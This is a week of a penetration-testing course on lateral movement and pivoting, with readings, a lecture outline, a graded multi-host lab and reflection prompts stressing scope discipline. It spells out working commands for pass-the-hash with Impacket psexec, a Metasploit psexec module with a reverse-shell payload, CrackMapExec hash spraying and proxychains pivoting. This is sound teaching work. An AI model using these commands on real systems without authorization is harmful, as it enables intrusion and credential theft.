Week 10: Lateral Movement, Pivoting, and Operational Security

The initial compromised host is a beachhead. Lateral movement is the process of using it to reach other systems inside the authorized network. This week covers credential reuse, pass-the-hash, network pivoting, and -- critically -- the operational security discipline that keeps the engagement within its authorized scope.

Reading (~1.5 hr)

Required:

• Weidman, Penetration Testing, Chapter 13 ("Post Exploitation"), sections on lateral movement (PSExec, pass-the-hash, token impersonation, pivoting). ~15 pages.
• HP3, Chapter 4 ("The Drive -- Compromising the Network"), the lateral movement and pivoting subsections (Responder, CrackMapExec, BloodHound/SharpHound, pass-the-hash, lateral movement via RDP). HP3 covers the red-team versions of the same techniques; the authorized-engagement constraint is identical.

Supplementary:

• Seitz + Arnold, Black Hat Python, Chapter 9 (network tooling with scapy; foundational for understanding what pass-the-hash is doing at the packet level).
• PTES, Post-Exploitation section (pentest-standard.org/Post_Exploitation), the lateral movement and pivoting subsections.

Lecture outline (~1 hr)

Part 1: Credential reuse and pass-the-hash (25 min)

The most reliable lateral movement technique is the simplest: using credentials that work on one system to authenticate to another. Credentials come from the post-exploitation phase in several forms.

Credential forms and their reuse vectors:

Pass-the-hash (PTH):

NTLM authentication does not require the plaintext password -- it requires the NTLM hash. Impacket's psexec.py accepts the hash directly:

# Pass-the-hash with Impacket psexec:
python3 /usr/share/doc/python3-impacket/examples/psexec.py \
    -hashes :<NTLM_hash> \
    Administrator@192.168.100.30

The hash was extracted from host A (Week 9, load kiwi; creds_all). It works on host B because the same local Administrator account with the same password hash exists on both hosts -- a common misconfiguration called "password reuse across local admin accounts."

From a Meterpreter session, Metasploit's psexec module does the same:

msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.100.30
msf6 > set SMBUser Administrator
msf6 > set SMBPass <NTLM_hash>
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > run

CrackMapExec for credential spraying:

CrackMapExec (crackmapexec or cme on Kali) tests credentials across a range of hosts:

# Test a credential set across the subnet:
crackmapexec smb 192.168.100.0/24 -u Administrator -H <NTLM_hash>
# Hosts that show (Pwn3d!) have local admin with this credential

This is a targeted test against the authorized lab range only. On a real engagement, spraying an NTLM hash across hosts you are authorized to test is permitted; spraying across IP ranges not in the ROE is not.

Part 2: Pivoting -- using host A to reach host B (20 min)

Pivoting uses a compromised host as a relay to reach network segments the attacker cannot reach directly. In the lab, the scenario is: Kali can reach the DMZ network (192.168.100.0/24), one DMZ host has been compromised, and that host has a second network interface on the internal LAN (10.0.0.0/24) that Kali cannot route to directly.

Adding a route in Metasploit:

# From a Meterpreter session on the pivot host:
meterpreter > run post/multi/manage/autoroute
# or:
meterpreter > background
msf6 > route add 10.0.0.0/24 <session-id>
# Now Metasploit modules routed through the pivot:
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.0.0.0/24
msf6 > run

Socks proxy with proxychains:

For tools outside Metasploit, use a Socks proxy:

# In Metasploit, start a socks proxy through the pivot session:
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > run -j

# Route any tool through the proxy:
proxychains nmap -sT -p 22,80,443,3389 10.0.0.10
proxychains python3 psexec.py Administrator@10.0.0.10

SSH port forwarding (when the pivot has SSH access):

# Local forward: listen on Kali:local_port, forward to 10.0.0.10:80 via the pivot:
ssh -L 8888:10.0.0.10:80 user@192.168.100.20
# Now: curl http://127.0.0.1:8888 reaches 10.0.0.10:80 through the SSH tunnel

Part 3: Scope discipline during lateral movement (15 min)

Lateral movement is the phase where scope violations are most likely. The momentum of finding credential reuse across many hosts can carry you past the authorized IP range. This is the point at which the ROE is most load-bearing.

Scope discipline practices:

1. Before every new connection attempt, ask: is this IP in the authorized range? The answer must be yes before you proceed.
2. If the pivot host has network interfaces you did not know about (enumerated by route or ipconfig), verify with the client or instructor whether those segments are in scope before probing them.
3. Maintain a running kill-chain map during the engagement. Each new host you reach should be logged: how you reached it, what credential you used, what you found. This map is the engagement transcript Lab 10 requires.
4. If you accidentally connect to a host outside scope: stop, document the timestamp, the IP, and the exact command that caused the connection, and notify the instructor immediately.

Lab 10: Lateral Movement and Multi-Host Engagement Transcript (~5 hr, graded)

See labs/lab-10-lateral-movement.md for the full lab.

Target: Instructor-provided multi-host lab network. The range includes Metasploitable 2 + a second host (Windows or Linux) with credential reuse from the first. Both are in the authorized range.

Authorization note: The authorized range is the lab network only. If you encounter IPs outside the stated range during pivoting or credential reuse, stop and notify the instructor.

Lab phases:

Phase 1: Establish foothold on Host A (Metasploitable 2)

Use any technique from Weeks 7-9. Document the foothold as: method, initial privilege level, and the key post-exploitation information gathered (running processes, network interfaces, credentials extracted).

Phase 2: Enumerate Host B from Host A

From the compromised session on Host A, enumerate Host B:

• What IP is Host B?
• What ports are open on Host B? (Port scan via proxychains or Metasploit route)
• Does Host B share any credential material with Host A?

Phase 3: Lateral movement to Host B

Use credentials extracted from Host A to authenticate to Host B. Document: the credential type (plaintext, NTLM hash, SSH key), the tool used, and the resulting shell privilege level.

Phase 4: Post-exploitation on Host B

Run LinPEAS or WinPEAS on Host B. What would the next escalation step be? (You do not need to execute it -- documenting the path is sufficient.)

Phase 5: Document the kill chain

Produce a kill-chain diagram in text format:

Kali (attacker) → [vsftpd exploit] → Host A (192.168.100.20, root)
  Host A → [NTLM hash reuse via psexec.py] → Host B (192.168.100.30, SYSTEM)
    Host B → [WinPEAS: unquoted service path] → SYSTEM (already at SYSTEM)

Deliverable: The engagement transcript (kill-chain diagram + per-host notes) and a one-page analysis: what credential reuse paths did you find, what network segments did you discover, and what is the business impact of this level of lateral movement in client terms?

Independent practice (~3 hr)

• Impacket exploration (1.5 hr): Explore the Impacket suite beyond psexec. The suite includes tools for SMB relay attacks (ntlmrelayx.py), Kerberos ticket manipulation (getTGT.py), and SMB share enumeration (smbclient.py). Read the help output of three tools you did not use in Lab 10.

  ls /usr/share/doc/python3-impacket/examples/
  
  

• Active Directory primer (1 hr): HP3 Chapter 4 covers Active Directory attack chains (BloodHound, Kerberoasting, DCSync). For PEN-101, this is exposure-level material; ADV-101 goes deeper. Read the BloodHound/SharpHound section and the Kerberoasting section for vocabulary. What is a service principal name (SPN) and why does it matter for Kerberoasting?
• Reflection (0.5 hr): Write the reflection prompts below.

Reflection prompts

1. The lab demonstrated credential reuse: the same local Administrator NTLM hash worked on both Host A and Host B. This is a misconfiguration at the organizational level, not a vulnerability in any specific software. How would you write this as a finding in the engagement report? What is the remediation, specifically -- what change does the client need to make?

2. You used proxychains to route nmap through the pivot. The nmap scan was a TCP Connect scan (-sT), not a SYN scan (-sS). Why does TCP Connect scan work through a SOCKS proxy when SYN scan does not? What does this imply about what an attacker can and cannot do through a proxied connection?

3. During lateral movement, you discovered that Host B has a third network interface connected to a 172.16.0.0/12 segment that is not in the ROE. The segment appears to contain the client's production database servers. What do you do? Write the sentence you would send to the client contact in the escalation communication described in the ROE.

Toolchain Diary: Week 10 additions

• Impacket (psexec.py, smbclient.py, secretsdump.py) -- Python network-protocol library for Windows authentication protocols. secretsdump.py dumps NTLM hashes remotely from the SAM or NTDS.dit without requiring a Meterpreter session. Source: github.com/fortra/impacket.
• CrackMapExec (cme) -- Multi-protocol post-exploitation Swiss army knife. Tests credentials across a range; runs commands; dumps SAM. crackmapexec --help for the full option tree.
• proxychains -- Routes TCP traffic from any tool through a SOCKS or HTTP proxy. Config at /etc/proxychains4.conf; set the socks5 proxy line to match Metasploit's socks proxy port.
• Metasploit route / autoroute -- Adds network routes through Meterpreter sessions so Metasploit modules can reach non-routable network segments.

What's next

Week 11 is reporting. Active testing is over. The engagement findings from Weeks 7-10 are the raw material; Week 11 teaches you to turn them into a document a client will pay for and act on.